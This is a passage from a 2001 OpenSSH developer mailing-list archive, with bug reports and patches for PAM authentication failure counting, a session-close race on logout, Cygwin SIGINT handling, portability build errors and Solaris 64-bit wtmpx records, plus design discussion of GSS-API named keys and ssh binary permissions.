cleanup 0x8065218(0x0) [root at toadhall (19) ssh]# So for one incorrect password the attempt/failure count goes from... debug1: attempt 3 failures 3 ... to... debug1: attempt 5 failures 4 ... and the session is disconnected after entering the second password regardless of whether it is the correct password or not. Also it is disconnecting becuase of too many requests not too many failures which doesn't seem right does it? Looking at the source it seems authctxt->attempt++ is being incrimented twice, once in auth2.c:input_userauth_request() and again in auth2-pam.c:input_userauth_info_response_pam(). Attached is a patch that fixed these symptoms for me. Attempt/failure are incimented one at a time, the last password prompt is no longer ignored, and the client is only disconnected after 6 (AUTH_FAIL_MAX) failures not after 6 attempts. I am not completly certain this behaviour matches the original intent so YMMV... M. -- WebCentral Pty Ltd Australia's #1 Internet Web Hosting Company Level 1, 96 Lytton Road. Network Operations - Systems Engineer PO Box 4169, East Brisbane. phone: +61 7 3249 2500 Queensland, Australia. pgp key id: 0x900E515F -------------- next part -------------- --- auth2-pam.c.orig Wed Jun 27 09:43:43 2001 +++ auth2-pam.c Wed Jun 27 09:44:54 2001 @@ -137,8 +137,8 @@ if (authctxt == NULL) fatal("input_userauth_info_response_pam: no authentication context"); - if (authctxt->attempt++ >= AUTH_FAIL_MAX) - packet_disconnect("too many failed userauth_requests"); + if (authctxt->failures >= AUTH_FAIL_MAX) + packet_disconnect(AUTH_FAIL_MSG, authctxt->user); nresp = packet_get_int(); /* Number of responses. */ debug("got %d responses", nresp); From cls at radiate.com Wed Jun 27 10:46:35 2001 From: cls at radiate.com (Chris Seawood) Date: Tue, 26 Jun 2001 17:46:35 -0700 Subject: SSH connection hanging on logout References: <20010521004748.5408.qmail@wizard.math.ualberta.ca> Message-ID: <3B392CEB.9000300@radiate.com> John Bowman wrote: > >The patch has been subjected to exhaustive testing. Unless someone reports >a case where it fails before the next release, please go ahead and include >it in the next Linux version of OpenSSH. (If you don't like the -S option >for some reason, you can always remove it and the sleep config option). > John, Thanks for providing the patch. I've been using it for a couple of weeks now without any problems. Well, with one tiny problem that just seemed to pop up today. If I use agent forwarding, then the patch doesn't prevent the hang problem. Have you run across this problem? - cls From djm at mindrot.org Wed Jun 27 15:00:24 2001 From: djm at mindrot.org (Damien Miller) Date: Wed, 27 Jun 2001 15:00:24 +1000 (EST) Subject: OpenSSH 2.9p2 with PAMAuthenticationViaKbdInt In-Reply-To: Message-ID: On Wed, 27 Jun 2001, Matthew Melvin wrote: > When using PAM to do password authenticaion the attempt/failure counter > appears to be getting confused. This is using a rh62 system with the > openssh-2.9p2-1 rpms... [snip] > So for one incorrect password the attempt/failure count goes from... > > debug1: attempt 3 failures 3 > > ... to... > > debug1: attempt 5 failures 4 > > Looking at the source it seems authctxt->attempt++ is being incrimented > twice, once in auth2.c:input_userauth_request() and again in > auth2-pam.c:input_userauth_info_response_pam(). > > Attached is a patch that fixed these symptoms for me. Attempt/failure are > incimented one at a time, the last password prompt is no longer ignored, and > the client is only disconnected after 6 (AUTH_FAIL_MAX) failures not after 6 > attempts. I am not completly certain this behaviour matches the original > intent so YMMV... I don't think the test is necessary at all, as the checking is done in userauth_finish anyway. How does this patch go? Index: auth2-pam.c =================================================================== RCS file: /var/cvs/openssh/auth2-pam.c,v retrieving revision 1.10 diff -u -r1.10 auth2-pam.c --- auth2-pam.c 2001/02/16 02:03:04 1.10 +++ auth2-pam.c 2001/06/27 04:59:59 @@ -137,9 +137,6 @@ if (authctxt == NULL) fatal("input_userauth_info_response_pam: no authentication context"); - if (authctxt->attempt++ >= AUTH_FAIL_MAX) - packet_disconnect("too many failed userauth_requests"); - nresp = packet_get_int(); /* Number of responses. */ debug("got %d responses", nresp); -d -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From matthewm at webcentral.com.au Wed Jun 27 15:30:02 2001 From: matthewm at webcentral.com.au (Matthew Melvin) Date: Wed, 27 Jun 2001 15:30:02 +1000 (EST) Subject: OpenSSH 2.9p2 with PAMAuthenticationViaKbdInt In-Reply-To: Message-ID: On Wed, 27 Jun 2001 at 3:00pm (+1000), Damien Miller wrote: > On Wed, 27 Jun 2001, Matthew Melvin wrote: > > > When using PAM to do password authenticaion the attempt/failure counter > > appears to be getting confused. This is using a rh62 system with the > > openssh-2.9p2-1 rpms... > > [snip] > > > So for one incorrect password the attempt/failure count goes from... > > > > debug1: attempt 3 failures 3 > > > > ... to... > > > > debug1: attempt 5 failures 4 > > > > Looking at the source it seems authctxt->attempt++ is being incrimented > > twice, once in auth2.c:input_userauth_request() and again in > > auth2-pam.c:input_userauth_info_response_pam(). > > > > Attached is a patch that fixed these symptoms for me. Attempt/failure are > > incimented one at a time, the last password prompt is no longer ignored, and > > the client is only disconnected after 6 (AUTH_FAIL_MAX) failures not after 6 > > attempts. I am not completly certain this behaviour matches the original > > intent so YMMV... > > I don't think the test is necessary at all, as the checking is done in > userauth_finish anyway. How does this patch go? > Hmm.. okay I've just rebuilt with this new patch and tried the same tests. It seems like removing the test all together does have the desired effect. M. -- WebCentral Pty Ltd Australia's #1 Internet Web Hosting Company Level 1, 96 Lytton Road. Network Operations - Systems Engineer PO Box 4169, East Brisbane. phone: +61 7 3249 2500 Queensland, Australia. pgp key id: 0x900E515F From tomh at po.crl.go.jp Wed Jun 27 18:03:24 2001 From: tomh at po.crl.go.jp (Tom Holroyd) Date: Wed, 27 Jun 2001 17:03:24 +0900 (JST) Subject: two GCC-3.0 warnings Message-ID: In openssh_cvs/openbsd-compat: readpassphrase.c: In function `readpassphrase': readpassphrase.c:116: warning: operation on `ch' may be undefined The offending line is: ch = ch &= 0x7f; probably should be: ch &= 0x7f; In openssh-2.9p2: readpass.c: In function `read_passphrase': readpass.c:120: warning: passing arg 2 of `ssh_askpass' discards qualifiers from pointer target type It seems to have shut up about the sftp-* printf format warnings. Seems to work OK... From scrosby at belcan.com Thu Jun 28 03:48:43 2001 From: scrosby at belcan.com (Scott Crosby) Date: Wed, 27 Jun 2001 13:48:43 -0400 Subject: OpenSSH, Cygwin, eXceed, and SIGINT Message-ID: <2DC4449D1872D311916600105AA0A2FD01DDF316@imaptech.belcan.com> All, When logging into an HP-UX 10.2 system from a Windows NT machine running Cygwin and openssh 2.9p2, control-c sends a sigint to the ssh client on the NT system, thus killing the ssh process. Interestingly enough, this behavior is only observed when using X11 forwarding. I can eliminate the behavior by changing clientloop.c to ignore SIGINT (signal(SIGINT, SIG_IGN) ) but then I'm bak to the old behavior of the remote shell ignoring SIGINT. Any suggestions? Scott From gert at greenie.muc.de Thu Jun 28 07:36:27 2001 From: gert at greenie.muc.de (Gert Doering) Date: Wed, 27 Jun 2001 23:36:27 +0200 Subject: OpenSSH, Cygwin, eXceed, and SIGINT In-Reply-To: <2DC4449D1872D311916600105AA0A2FD01DDF316@imaptech.belcan.com>; from Scott Crosby on Wed, Jun 27, 2001 at 01:48:43PM -0400 References: <2DC4449D1872D311916600105AA0A2FD01DDF316@imaptech.belcan.com> Message-ID: <20010627233627.D20011@greenie.muc.de> Hi, On Wed, Jun 27, 2001 at 01:48:43PM -0400, Scott Crosby wrote: > When logging into an HP-UX 10.2 system from a Windows NT machine > running Cygwin and openssh 2.9p2, control-c sends a sigint to the ssh client > on the NT system, thus killing the ssh process. Interestingly enough, this > behavior is only observed when using X11 forwarding. I can eliminate the > behavior by changing clientloop.c to ignore SIGINT (signal(SIGINT, SIG_IGN) > ) but then I'm bak to the old behavior of the remote shell ignoring SIGINT. If the client were running on a unix machine, I'd say that the "ISIG" and/or "ICANON" flags of the tty control structure are not cleared (thus making the local terminal handler interpret ctrl-c and generate a SIGINT). As this is Cygwin, I have no idea, never used this, and I have no idea whether they have POSIX tty "things" (POSIX termios structure, and underlying logic). gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From mouring at etoh.eviladmin.org Thu Jun 28 08:26:26 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Wed, 27 Jun 2001 17:26:26 -0500 (CDT) Subject: A one line modification to fix contrib/solaris/postinstall.in In-Reply-To: <20010627181316.N24756@newbabe.mengwong.com> Message-ID: It's been discussed and key generation really should be put in the sshd startup script. However, neither I nor anyone has had the time to modify the solaris scripts to do so. I still would like to see a full rewrite of solaris/ without all the hard coded crap. - Ben On Wed, 27 Jun 2001, Roman Gollent wrote: > Gentlefolk, > > You may wish to add > > CONFDIR="${BASEDIR}/etc" > > to the beginning of postinstall.in to fix the problem where > files going into */etc are not copied properly when the > generated package is being added via jumpstart. > > There are still outstanding issues with key generation > during jumpstart which I might be able to address without > having to resort to an external script but that will > probably involve all kinds of ugliness (like insuring > openSSL is installed first and that LD_LIBRARY_PATH is set > to point at it). At the very least, all the files will be > copied into the correct location with the above addition. > > Best Regards, > Roman > > From nakaji at tutrp.tut.ac.jp Thu Jun 28 11:33:48 2001 From: nakaji at tutrp.tut.ac.jp (NAKAJI Hiroyuki) Date: 28 Jun 2001 10:33:48 +0900 Subject: `_POSIX_VDISABLE' undeclared Message-ID: <877kxxwfpf.fsf@boggy.acest.tutrp.tut.ac.jp> Dear developpers, I'm using OpenSSH_2.9p1 with prngd on my Sony NEWS-OS 4.2.1R. NEWS-OS 4.x is based on 4.3BSD and lack of many POSIX and ANSI features. Today I tried to make the latest openssh_cvs and got the following error, gcc -g -O2 -Wall -O -I. -I.. -I. -I./.. -I/usr/local/ssl/include -DHAVE_CONFIG_H -c readpassphrase.c readpassphrase.c: In function `readpassphrase': readpassphrase.c:89: `_POSIX_VDISABLE' undeclared (first use this function) readpassphrase.c:89: (Each undeclared identifier is reported only once readpassphrase.c:89: for each function it appears in.) readpassphrase.c:54: warning: `status' might be used uninitialized in this function gmake[1]: *** [readpassphrase.o] Error 1 Any help is appreciated. Thanks. P.S. I configured with '--with-cflags="-O"' but CFLAGS is set "-g -O2 -Wall -O". This should be fixed, too. -- NAKAJI Hiroyuki From mouring at etoh.eviladmin.org Thu Jun 28 13:33:01 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Wed, 27 Jun 2001 22:33:01 -0500 (CDT) Subject: `_POSIX_VDISABLE' undeclared In-Reply-To: <877kxxwfpf.fsf@boggy.acest.tutrp.tut.ac.jp> Message-ID: On 28 Jun 2001, NAKAJI Hiroyuki wrote: > Dear developpers, > > I'm using OpenSSH_2.9p1 with prngd on my Sony NEWS-OS 4.2.1R. > NEWS-OS 4.x is based on 4.3BSD and lack of many POSIX and ANSI features. > > Today I tried to make the latest openssh_cvs and got the following error, > > gcc -g -O2 -Wall -O -I. -I.. -I. -I./.. -I/usr/local/ssl/include -DHAVE_CONFIG_H -c readpassphrase.c > readpassphrase.c: In function `readpassphrase': > readpassphrase.c:89: `_POSIX_VDISABLE' undeclared (first use this function) > readpassphrase.c:89: (Each undeclared identifier is reported only once > readpassphrase.c:89: for each function it appears in.) > readpassphrase.c:54: warning: `status' might be used uninitialized in this function > gmake[1]: *** [readpassphrase.o] Error 1 > Will the attach patch fix the problem. It's very much untested (I'll fire my NeXT box up this weekend for OpenSSH -head testing), but as long as VSTATUS is not set. Then it's safe to wrap the whole _POSIX_VDISABLE stuff around #ifdef and ignore it on those platforms. Not stating it's the best solution. =) But I think it is more correct then defining _POSIX_VDISABLE if it does not exist. But it may not be a bad idea to unset VSTATUS if _POSIX_VDISABLE does not exist just to ensure. - Ben Index: readpassphrase.c =================================================================== RCS file: /var/cvs/openssh/openbsd-compat/readpassphrase.c,v retrieving revision 1.2 diff -u -r1.2 readpassphrase.c --- readpassphrase.c 2001/06/27 13:26:39 1.2 +++ readpassphrase.c 2001/06/28 03:45:20 @@ -51,7 +51,9 @@ { struct termios term; char ch, *p, *end; +#ifdef _POSIX_VDISABLE u_char status; +#endif int echo, input, output; sigset_t oset, nset; @@ -86,7 +88,9 @@ /* Turn off echo if possible. */ echo = 0; +#ifdef _POSIX_VDISABLE status = _POSIX_VDISABLE; +#endif if (tcgetattr(input, &term) == 0) { if (!(flags & RPP_ECHO_ON) && (term.c_lflag & ECHO)) { echo = 1; @@ -124,7 +128,11 @@ } } *p = '\0'; +#ifdef _POSIX_VDISABLE if (echo || status != _POSIX_VDISABLE) { +#else + if (echo) { +#endif if (echo) { (void)write(output, "\n", 1); term.c_lflag |= ECHO; From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 28 20:04:28 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 28 Jun 2001 12:04:28 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010623000306.A14300@folly>; from markus.friedl@informatik.uni-erlangen.de on Sat, Jun 23, 2001 at 12:03:06AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> <20010621151214.A27941@ws01.aet.tu-cottbus.de> <20010623000306.A14300@folly> Message-ID: <20010628120427.B8752@ws01.aet.tu-cottbus.de> On Sat, Jun 23, 2001 at 12:03:06AM +0200, Markus Friedl wrote: > i get this on openbsd-current: > > Connection closed by remote host. > debug1: channel_free: channel 0: server-session, nchannels 1 > debug3: channel_free: status: The following connections are open: > #0 server-session (t4 r0 i1/0 o16/0 fd 4/3) > > debug1: channel_free: channel 0: dettaching channel user > debug1: session_by_channel: session 0 channel 0 > debug1: session_close_by_channel: channel 0 kill 5870 > debug1: Received SIGCHLD. > debug3: channel_close_fds: channel 0: r 4 w 3 e -1 > debug1: session_by_pid: pid 5870 > debug1: session_close: session 0 pid 5870 > debug1: session_pty_cleanup: session 0 release /dev/ttyqc > Closing connection to 127.0.0.1 Today I found some time to fire up DDD against the latest CVS version: * The problem still persists in normal operation. -------------------------------------------------------------------------- Connection closed by remote host. debug1: channel_free: channel 0: server-session, nchannels 2 debug3: channel_free: status: The following connections are open: #0 server-session (t4 r0 i1/0 o16/0 fd 7/3) debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 8599 debug3: channel_close_fds: channel 0: r 7 w 3 e -1 debug1: channel_free: channel 1: X11 inet listener, nchannels 1 debug3: channel_free: status: The following connections are open: debug3: channel_close_fds: channel 1: r 8 w 8 e -1 Closing connection to 141.43.132.151 -------------------------------------------------------------------------- * The problem does not appear when stepping through the code. -> This immediatly brings up the idea of a race condition. session_by_pid is called, when SIGCHLD has been received and is detected at the end of serverloop2(). Due to the WNOHANG flag, if SIGCHLD was not yet received after channel_free_all() was finished, the exiting of the child won't be noted and session_close_by_pid() will never be called (for that child). For test purposes, I have extended the code by a "sleep(1)" and now session_close_by_pid() is properly called: channel_free_all(); #start inserted by Lutz sleep(1); #end inserted by Lutz signal(SIGCHLD, SIG_DFL); while ((pid = waitpid(-1, &status, WNOHANG)) > 0) session_close_by_pid(pid, status); -------------------------------------------------------------------------- Connection closed by remote host. debug1: channel_free: channel 0: server-session, nchannels 2 debug3: channel_free: status: The following connections are open: #0 server-session (t4 r0 i1/0 o16/0 fd 7/3) debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 8729 debug3: channel_close_fds: channel 0: r 7 w 3 e -1 debug1: channel_free: channel 1: X11 inet listener, nchannels 1 debug3: channel_free: status: The following connections are open: debug3: channel_close_fds: channel 1: r 8 w 8 e -1 debug1: Received SIGCHLD. debug1: session_by_pid: pid 8729 debug1: session_close: session 0 pid 8729 debug1: session_pty_cleanup: session 0 release /dev/pts/9 Closing connection to 141.43.132.151 -------------------------------------------------------------------------- That leaves the question about a "cleaner" solution to this effect. After first sending the bug report, I received private mails indicating, that this effect has also been seen on Linux, so it is not a pure HP-problem. As session_close_by_channel() kill()s the child with either TERM or HUP, the child has the opportunity to perform some cleanup before exit, so it is well possible that there is a delay causing the problem. (I use tcsh to see this effect, for what its worth.) Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From scrosby at belcan.com Thu Jun 28 23:31:10 2001 From: scrosby at belcan.com (Scott Crosby) Date: Thu, 28 Jun 2001 09:31:10 -0400 Subject: OpenSSH, Cygwin, eXceed, and SIGINT Message-ID: <2DC4449D1872D311916600105AA0A2FD01DDF318@imaptech.belcan.com> Gert, Both ISIG and ICANON are being cleared (both with and without x11 forwarding enabled,) vi enter_raw_mode() in sshtty.c. The part that perplexes me is that the bug only shows up when x11 forwarding is enabled. Any ideas? -----Original Message----- From: Gert Doering [mailto:gert at greenie.muc.de] Sent: Wednesday, June 27, 2001 5:36 PM To: Scott Crosby; 'openssh-unix-dev at mindrot.org' Subject: Re: OpenSSH, Cygwin, eXceed, and SIGINT Hi, On Wed, Jun 27, 2001 at 01:48:43PM -0400, Scott Crosby wrote: > When logging into an HP-UX 10.2 system from a Windows NT machine > running Cygwin and openssh 2.9p2, control-c sends a sigint to the ssh client > on the NT system, thus killing the ssh process. Interestingly enough, this > behavior is only observed when using X11 forwarding. I can eliminate the > behavior by changing clientloop.c to ignore SIGINT (signal(SIGINT, SIG_IGN) > ) but then I'm bak to the old behavior of the remote shell ignoring SIGINT. If the client were running on a unix machine, I'd say that the "ISIG" and/or "ICANON" flags of the tty control structure are not cleared (thus making the local terminal handler interpret ctrl-c and generate a SIGINT). As this is Cygwin, I have no idea, never used this, and I have no idea whether they have POSIX tty "things" (POSIX termios structure, and underlying logic). gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From jan.suchanek at informatik.uni-ulm.de Thu Jun 28 23:33:52 2001 From: jan.suchanek at informatik.uni-ulm.de (Jan Suchanek) Date: Thu, 28 Jun 2001 15:33:52 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] Message-ID: <3B3B3240.A10ECA75@informatik.uni-ulm.de> Hello! > That leaves the question about a "cleaner" solution to this effect. > After first sending the bug report, I received private mails indicating, > that this effect has also been seen on Linux, so it is not a pure HP-problem. Thats right; the problem appears on Linux as well. I have tried even the new snapshots in which the problem should be fixed - without success. Now I tried the "Lutz-bugfix" and it works on Linux, too. Greetings, Jan -- Jan Suchanek, Universitaet Ulm, URG, Fakultaet fuer Informatik, 89069 Ulm, Germany Raum: O27/243 Tel.: +49/(0)731-5024205, Fax: +49/(0)731-5024202 From gert at greenie.muc.de Thu Jun 28 23:41:47 2001 From: gert at greenie.muc.de (Gert Doering) Date: Thu, 28 Jun 2001 15:41:47 +0200 Subject: OpenSSH, Cygwin, eXceed, and SIGINT In-Reply-To: <2DC4449D1872D311916600105AA0A2FD01DDF318@imaptech.belcan.com>; from Scott Crosby on Thu, Jun 28, 2001 at 09:31:10AM -0400 References: <2DC4449D1872D311916600105AA0A2FD01DDF318@imaptech.belcan.com> Message-ID: <20010628154147.M15538@greenie.muc.de> Hi, On Thu, Jun 28, 2001 at 09:31:10AM -0400, Scott Crosby wrote: > Both ISIG and ICANON are being cleared (both with and without x11 > forwarding enabled,) vi enter_raw_mode() in sshtty.c. The part that > perplexes me is that the bug only shows up when x11 forwarding is enabled. > Any ideas? Maybe the termios structure is reset to "saved" values somewhere? (I didn't look into the code, just guessing). If that's true, it should also appear on Linux, unless X11 forwarding has special cygwin code... gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From Nicolas.Williams at ubsw.com Fri Jun 29 06:57:14 2001 From: Nicolas.Williams at ubsw.com (Nicolas Williams) Date: Thu, 28 Jun 2001 16:57:14 -0400 Subject: Adding 'name' key types Message-ID: <20010628165713.L9416@sm2p1386swk.wdr.com> Playing around with the [wonderful] GSS-API patches for OpenSSH [1] I noticed that there is a bit of functionality missing from OpenSSH/GSS-API, namely that authorized_keys2 has no meaning when using GSS authentication. Yes, ~/.k5login can be used to grant access to an account for applications that support Kerberos, as does OpenSSH with those GSS patches, but .k5login does not and cannot provide the from/command/environment and other useful options that SSH's authorized_keys2 file entries can. So, after looking around, especially in key.h and key.c and auth2.c, it occurred to me that a new key type could be added for dealing with named keys, that is, names which can be authenticated (e.g., certificate names, Kerberos principal names). The neat thing is that auth2.c:user_key_allowed() is key-type independent (so arguably it doesn't belong in auth2.c), and thus could be called from ssh_gssapi_userok() [instead of, or in addition to the GSS mechanism specific *userok() methods]. The only questions, in my mind, are - how to format key names for use in authorized_keys2? I propose starting the key blob with 'name:' followed by a possibly null mechanism name, another ':' and the key name in question (uuencoded so whitespace, non-ascii characters and so on can be unambiguously present in key names). - how to deal with generic names vs. mechanism specific names? I.e., should an 'exported' GSS name be checked as a 'gss' key name type? Or should it be checked against a name type specific to the mechanism used to authenticate the client? I think this should probably be optional behaviour. [1] http://www.sxw.org.uk/computing/patches/ Thoughts? Flames? Nico -- . Visit our website at http://www.ubswarburg.com This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. This message is provided for informational purposes and should not be construed as a solicitation or offer to buy or sell any securities or related financial instruments. From dbt at meat.net Fri Jun 29 12:21:59 2001 From: dbt at meat.net (David Terrell) Date: Thu, 28 Jun 2001 19:21:59 -0700 Subject: FW: poor permissions on ssh binary In-Reply-To: <791BD3CB503DD411A6510008C7CF647701F40C34@col-581-exs01.cist.saic.com>; from GILBERT.R.LOOMIS@saic.com on Tue, Jun 19, 2001 at 10:14:17AM -0400 References: <791BD3CB503DD411A6510008C7CF647701F40C34@col-581-exs01.cist.saic.com> Message-ID: <20010628192159.A23931@pianosa.catch22.org> On Tue, Jun 19, 2001 at 10:14:17AM -0400, Loomis, Rip wrote: > Advantages of 0711 perms: > 1. Doesn't allow non-privileged users to read > the installed binaries (which could > be used to run strings against them to > find out compiled options, etc.) unprivileged users can probably still do this by attaching to the running process with a debugger, if they really want to know. Or through observing deterministic behavior. > 2. Doesn't allow non-privileged users to copy > the installed binaries to other systems > or locations (the copied binaries could > then *potentially* be directly modified > or trojaned--but this is highly unlikely > in today's world). > 3. System administrators can still copy the > installed binaries to other systems or > locations. System administrators who like to su you mean. > Note that I don't think that those advantages > are particularly amazing, and in fact any > bad guy who wants to do something evil with > OpenSSH would just start with the source. > However, the binaries run just fine with the > current permissions, and there's this important > security concept called Least Privilege--which > I'll explain in this case as "one shouldn't go > around giving users or processes powers that > they don't absolutely require, because one can't > always predict future bugs and exposures." As a system administrator, I like being able to do as little as root as possible. Being able to ship ssh binaries from one machine to another without having to su just to get them is one way to reduce that. There's no security hole in making non-setuid or setuid binaries readable that I know of. If there are, then those holes should be fixed. -- David Terrell | "My question is, if a mime types, isn't dbt at meat.net | that kinda cheating?" http://wwn.nebcorp.com/ | - Jason Zych From iseki at ksp.nis.nec.co.jp Fri Jun 29 12:30:16 2001 From: iseki at ksp.nis.nec.co.jp (Takefumi Iseki) Date: Fri, 29 Jun 2001 11:30:16 +0900 Subject: wtmpx problem on Solaris 8 sparcv9 (64bit) environment Message-ID: <200106291130.AHI47431.FJLJT@ksp.nis.nec.co.jp> Hello When I was using OpenSSH-2.9p2 in Solaris 8 sparcv9 (64bit) environment, I found some trouble that wtmpx has broken. The size of utmpx structure object becomes larger than 32 bit environment in sparcv9 environment.Therefore, instead of using utmpx structure object, using futmpx structure object is better. In sparcv9 environment, futmpx structure object is used instead of utmpx structure object. The system is as follows. OpenSSH Version: 2.9p2 OS: % uname -a SunOS foo 5.8 Generic_108528-06 sun4u sparc SUNW,UltraSPARC-IIi-cEngine % isainfo -v 64-bit sparcv9 applications 32-bit sparc applications Please look at reference. % cat utmptest.c #include #include #include main () { struct utmp utmp; struct futmp futmp; struct utmpx utmpx; struct futmpx futmpx; printf("utmp: %d, futmp: %d / utmpx: %d, futmpx: %d\n", sizeof(utmp), sizeof(futmp), sizeof(utmpx), sizeof(futmpx)); return(1); } % cc utmptest.c % ./a.out utmp: 36, futmp: 36 / utmpx: 372, futmpx: 372 % cc -xarch=v9 utmptest.c % ./a.out utmp: 40, futmp: 36 / utmpx: 384, futmpx: 372 Following are patch for "openssh-2.9p2/loginrec.c" file. diff -Naur openssh-2.9p2.org/loginrec.c openssh-2.9p2.cast/loginrec.c --- openssh-2.9p2.org/loginrec.c Wed May 9 05:34:33 2001 +++ openssh-2.9p2.cast/loginrec.c Thu Jun 28 11:06:22 2001 @@ -887,7 +891,11 @@ /* write a utmpx entry with the system's help (pututxline() and pals) */ # ifdef UTMPX_USE_LIBRARY static int +#ifdef __sparcv9 +utmpx_write_library(struct logininfo *li, struct utmpx *utx) +#else utmpx_write_library(struct logininfo *li, struct utmpx *utx) +#endif { setutxent(); pututxline(utx); @@ -902,7 +910,11 @@ /* write a utmp entry direct to the file */ static int +#ifdef __sparcv9 +utmpx_write_direct(struct logininfo *li, struct futmpx *utx) +#else utmpx_write_direct(struct logininfo *li, struct utmpx *utx) +#endif { log("utmpx_write_direct: not implemented!"); return 0; @@ -1144,7 +1156,11 @@ /* write a wtmpx entry direct to the end of the file */ /* This is a slight modification of code in OpenBSD's logwtmp.c */ static int +#ifdef __sparcv9 +wtmpx_write(struct logininfo *li, struct futmpx *utx) +#else wtmpx_write(struct logininfo *li, struct utmpx *utx) +#endif { struct stat buf; int fd, ret = 1; @@ -1167,6 +1183,24 @@ return ret; } +#ifdef __sparcv9 +void +utmpx_to_futmpx(struct utmpx *utx, struct futmpx *futx) +{ + strncpy(futx->ut_user, utx->ut_user, sizeof(futx->ut_user)); + strncpy(futx->ut_id, utx->ut_id, sizeof(futx->ut_id)); + strncpy(futx->ut_line, utx->ut_line, sizeof(futx->ut_line)); + futx->ut_pid = (pid32_t)utx->ut_pid; + futx->ut_type = (int16_t)utx->ut_type; + futx->ut_exit.e_termination = (int16_t)utx->ut_exit.e_termination; + futx->ut_exit.e_exit = (int16_t)utx->ut_exit.e_exit; + futx->ut_tv.tv_sec = (time32_t)utx->ut_tv.tv_sec; + futx->ut_tv.tv_usec = (int32_t)utx->ut_tv.tv_usec; + futx->ut_session = (int32_t)utx->ut_session; + futx->ut_syslen = (int16_t)utx->ut_syslen; + strncpy(futx->ut_host, utx->ut_host, sizeof(futx->ut_host)); +} +#endif static int wtmpx_perform_login(struct logininfo *li) @@ -1174,7 +1208,15 @@ struct utmpx utx; construct_utmpx(li, &utx); +#ifdef __sparcv9 + { + struct futmpx futx; + utmpx_to_futmpx(&utx , &futx); + return wtmpx_write(li, &futx); + } +#else return wtmpx_write(li, &utx); +#endif } @@ -1184,7 +1226,16 @@ struct utmpx utx; construct_utmpx(li, &utx); - return wtmpx_write(li, &utx); +#ifdef __sparcv9 + { + struct futmpx futx; + utmpx_to_futmpx(&utx , &futx); + return wtmpx_write(li, &futx); + } +#else + return wtmpx_write(li, &utx); +#endif + } @@ -1207,7 +1258,11 @@ /* Return true if this wtmpx entry indicates a login */ static int +#ifdef __sparcv9 +wtmpx_islogin(struct logininfo *li, struct futmpx *utx) +#else wtmpx_islogin(struct logininfo *li, struct utmpx *utx) +#endif { if ( strncmp(li->username, utx->ut_name, MIN_SIZEOF(li->username, utx->ut_name)) == 0 ) { @@ -1226,7 +1281,11 @@ wtmpx_get_entry(struct logininfo *li) { struct stat st; +#ifdef __sparcv9 + struct futmpx utx; +#else struct utmpx utx; +#endif int fd, found=0; /* Clear the time entries */ @@ -1245,7 +1304,11 @@ } /* Seek to the start of the last struct utmpx */ +#ifdef __sparcv9 + if (lseek(fd, (off_t)(0-sizeof(struct futmpx)), SEEK_END) == -1 ) { +#else if (lseek(fd, (off_t)(0-sizeof(struct utmpx)), SEEK_END) == -1 ) { +#endif /* probably a newly rotated wtmpx file */ close(fd); return 0; @@ -1275,7 +1338,11 @@ # endif continue; } +#ifdef __sparcv9 + if (lseek(fd, (off_t)(0-2*sizeof(struct futmpx)), SEEK_CUR) == -1) { +#else if (lseek(fd, (off_t)(0-2*sizeof(struct utmpx)), SEEK_CUR) == -1) { +#endif close (fd); return 0; } From Darren.Moffat at eng.sun.com Sat Jun 30 01:57:46 2001 From: Darren.Moffat at eng.sun.com (Darren Moffat) Date: Fri, 29 Jun 2001 08:57:46 -0700 (PDT) Subject: wtmpx problem on Solaris 8 sparcv9 (64bit) environment Message-ID: <200106291558.f5TFwhU843593@jurassic.eng.sun.com> >When I was using OpenSSH-2.9p2 in Solaris 8 sparcv9 (64bit) >environment, I found some trouble that wtmpx has broken. Why are you building 64bit binaries for ssh ? This will gain you nothing and there is no reason to do so. 32bit binaries run just fine on a 64bit kernel (most of Solaris is still 32bit binaries even when running a 64bit kernel). There are currently only 4 reasons to compile userland binaries 64bit rather than 32bit: 1. The process needs greater than 4Gb address space 2. Need for a 64bit time_t ie need to process times past 2038 3. Direct access to kernel memory when runing a 64bit kernel 4. Need to control a 64bit process via /proc (ie you are a debugger). None of the ssh programs fall into these categories. You can do 64bit maths without building a 64bit binary and you can get UltraSPARC performance improvements on 32bit binaries - infact in general 32bit binaries perform better than 64bit ones. If you are 